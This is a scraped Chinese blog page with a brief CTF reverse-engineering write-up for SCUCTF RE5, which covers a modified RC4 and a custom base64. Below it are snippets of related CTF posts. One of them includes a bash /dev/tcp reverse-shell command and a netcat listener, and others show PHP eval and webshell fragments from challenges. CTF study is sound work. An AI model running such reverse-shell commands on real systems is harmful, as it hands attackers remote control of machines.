SCUCTF RE

最新推荐文章于 2025-02-22 15:35:07 发布
最新推荐文章于 2025-02-22 15:35:07 发布
阅读量436 收藏
点赞数
分类专栏: ctf 文章标签: 皮三宝
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43487707/article/details/85289475
版权

SCUCTF RE5

这题一开始没写出来。。。后来看了网上大神的wp后了解了
学到了很多,比如rc4加密啊
当然这题目设计的加密都是魔改的
在这里插入图片描述
先看大概流程,前面俩函数主要是吧输入的name和info转移
通过动态调试可以试出来
在这里插入图片描述
然后是魔改的rc4加密,根据rc4对称性,只要知道异或的几个数就行了,所以用od调试可以获得。
然后是改了码表的base64加密。
所以逆运算的话就是吧txt里的先来一次魔改base64,然后与调试所得的异或对象进行异或就能跑出flag
网上某大佬写的很详细的,直接附上链接吧。
http://www.cnblogs.com/Fingerprint/p/10086372.html
咕咕咕
准备入门pwn了
下期预告
中原工比赛第二题re
上次写的是第三题的re

2021.05.25 XCTF入门RE | CTF - RE
JiangBuLiu的博客
03-19 2067
样本编译方式CPython南邮Py.pyc C Python 支持所有Python版本的Pyc反编译工具(在线) 或者下载pyc的反编译工具uncompyle6 南邮Py.pyc 反编译后的源码为: import base64 def encode(message): s = '' for i in message: x = ord(i) ^ 32 x = x + 16 s += chr(x) return base64.b64en
SCUCTF2020部分writeup
博客
06-21 1207
SCUCTF2020部分writeup MISC 专 业 团 队 binwalk -e Daning.png 提取出word文档 scuctf{19cc63ff-50b9-4254-a997-89d613290918} 记录 flag{b80e3ba4-055f-4c26-9482-23dc46424852} APU的犯罪证据 上传的shell <?php session_start(); function fastpow($a,$b,$c) { if($b==0) ret
SCUCTF
皮三宝好菜的博客
12-25 726
SCUCTF RE re1 拖进ida里一看就出来了 但是提交的时候答案是SCUCTF{}。。。。。。 没搞懂为啥,害得我调试了半天 re2 程序加壳了直接脱了后看伪代码 //第一次写的时候没脱壳。。。因为加密算法比较简答,就是和0x27逐个异或么。。。 上py a = [0x74, 0x5E, 0x5C, 0x75, 0x42, 0x51, 0x14, 0x55, 0x54, 0x42, ...
ctf网络安全题库 ctf网络安全大赛答案
最新发布
Hacker_Fuchen的博客
02-22 1817
给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果。黑客工具&SRC技术文档&PDF书籍&web安全等(可分享)网络安全产业就像一个江湖,各色人等聚集。
2022SCUCTF
unexpectedthing的博客
05-22 722
前言 这次出了两个题,但是只放了一个easy_web这个题。镜像我都上传到我的dockerhub里了,自己需要的可以拉取。z3eyond的dockerhub easy_web F12,想到了robots.txt,下载源码 下载后开始审计代码,这儿我就不把源码复制过来了。 根据源码的User.class.php,直接admin,password登录进去 构造pop链 看到php文件中有很多魔法函数,就需要构造一个pop链子 链子从头到尾找,头部在User类的__desctruct中,然后尾部是在Files类
SCUCTF部分wp
weixin_44057967的博客
04-10 592
之前没有接触过Crypto的题,现在在学校的平台上练习,也是给自己的一个记录: Crypto1: JTVDdTAwMjYlNUN1MDAyMyU1Q3UwMDMxJTVDdTAwMzElNUN1MDAzNSU1Q3UwMDNiJTVDdTAwMjYlNUN1MDAyMyU1Q3UwMDM5JTVDdTAwMzklNUN1MDAzYiU1Q3UwMDI2JTVDdTAwMjMlNUN1MDAzMSU...
SCUCTF部分wp(2)
weixin_44057967的博客
04-10 193
#写一道做了一早上的MISC: 1.下载下来直接wireshark 2.找http请求 3.发现有三个文件上传的http请求 4.导出 5.打开后分别是key 加密算法 和 加密后密文 6.写个py直接解密 ##走的一些弯路: 1.下载后有一个webkit+一串hex,一开始以为跟解题有关系,后来发现其实就是一个**标识符?**没什么卵用 2.打开加密算法发现加密好复杂…实在不会解…搜了搜类似的...
2021SCUCTF校赛web之奇妙的验证码
luo1289的博客
06-07 1105
题目给出信息: 用户名为 admin 密码为四位数字 验证码为一个表达式的结果 验证码错误会导致密码重置 xiang'dao
2021SCUCTF校赛MISC之ez_rar
luo1289的博客
06-07 551
有一个flag.rar 用bandizip打开
2019SCUCTF部分题解
博客
05-20 1259
writeup2019SCUCTF部分题解赛前通知解题思路flagweb来了老弟解题思路flag你好呀解题思路参考链接:flag简单的XSS解题思路参考链接flag稍难一点的XSS解题思路参考链接flagreshowme666解题思路参考链接flagpwnbabystack解题思路flaglogin解题思路flagMISC流量分析解题思路参考链接flagstream解题思路flag婉姐姐的内存镜像...
2018 SCUCTF web题:cat?非常规题解
博客
12-19 1884
主要思路 1.寻找可以写入的目录 2.通过 &gt; 构造文件名,在通过 ls -th&gt;g 将命令写入文件 3.通过bash -i &gt;&amp; /dev/tcp/你的公网ip/监听的端口 0&gt;&amp;1构造反弹shell 4.在服务器使用 "nc -lnvp 相应端口" python脚本如下 # -*- coding: utf8 -*- import requests im...
CTF之re
博客
09-15 277
linux库函数劫持技术 - 程序园 http://www.voidcn.com/article/p-sinxjpki-pz.html
CTF-re --变种密码分析(RC4、TEA、AES)
shdbehdvd的博客
11-10 761
RC4、TEA、AES魔改----re
CTF-RE-WcyVM
SuperGate的博客
12-14 1001
题源:nctf2018 逆向+虚拟机鬼畜题,对萌新来说是非常好的一道虚拟机入门题 如果缺少虚拟机相关知识先看一下这篇文章:https://www.52pojie.cn/forum.php?mod=viewthread&amp;tid=713219 首先我们用LINUX执行这个文件,提示要我们输入字符,随便输几个之后输入文本结束符号。我们发现程序没办法继续运行下去了。于是扔进ida开始调试。...
[SCUCTF]2021 校赛 Web题目复现
cosmoslin的博客
04-08 2188
web 1 入门 查看headers 2 shell <?php if(isset($_GET['eval'])){ $eval = $_GET['eval']; if(!preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("$eval"); }else{ die("hacker??"); } }else{ highlight_file(__FILE__); } ?
CTF-----RE新手练习(一)
qq_45671431的博客
04-17 3051
学习打卡篇七 ** IDA ** IDA是一款交互式反汇编工具,亦是是典型的递归下降反汇编器,是逆向学习的必备工具之一,IDA全称为Interactive Disassembler Professional。 官方下载地址 IDA常用快捷键: 空格键:切换文本视图与图表视图 ESC:返回上一个操作地址 G:搜索地址和符号 N:对符号,或变量进行重命名 分号键:在反汇编后的界面中写下注释 Alt...
CG CTF RE Hello,RE!
无限迭代中......
07-05 608
https://cgctf.nuptsast.com/files/1.exe 题解: 工具:IDA Pro 打开这个.exe之后可以看见输入flag,输入2次之后猜测是一个循环只有输入正确才会停止 直接把它丢进IDA中分析,F5可以得到主代码的汇编语言代码 flag{Welcome_To_RE_World!} ...
[SCUCTF2022]校赛Web出题笔记
cosmoslin的博客
05-27 2169
前言 本次校赛我出了两个题,一个签到一个中等,由于自己的原因导致这两道题都出现了比较离谱的非预期,这里给师傅们谢罪了。 checkin <?php error_reporting(0); $action = $_GET['a']?$_GET['a']:highlight_file(__FILE__); if($action==='inject'){ die('Permission denied'); } $lock = call_user_func(($_GET['Y'])); if (
CTF-----RE练习题(二)
qq_45671431的博客
04-20 2812
学习打卡篇八 每天学习一点点 认识壳 在一些计算机软件里有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。由于这段程序和自然界的壳在功能上有很多相同的地方,所以就把这样的程序称为壳。 壳的分类 通常将壳分为两类,一类是压缩壳,另一类是加密壳。 压缩壳 :使用压缩壳可以帮助缩减 PE 文件的大小,隐藏了 PE 文件内部代码和资源...
2020 SCUCTF 新生赛 crypto RSA wp
cosmoslin的博客
11-28 728
2020 SCUCTF 新生赛 crypto RSA wp 简介 第一次写博客,记录自己第一次CTF比赛,内容为2020年scuctf新生赛的crypto部分。 RSA加密算法 由来 RSA是1977年由罗纳德·李维斯特(Ron Rivest)、阿迪·萨莫尔(Adi Shamir)和伦纳德·阿德曼(Leonard Adleman)一起提出的。当时他们三人都在麻省理工学院工作。RSA就是他们三人姓氏开头字母拼在一起组成的 。 算法原理 RSA公开密钥密码体制的原理是:根据数论,寻求两个大素数比较简单,而将它们
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值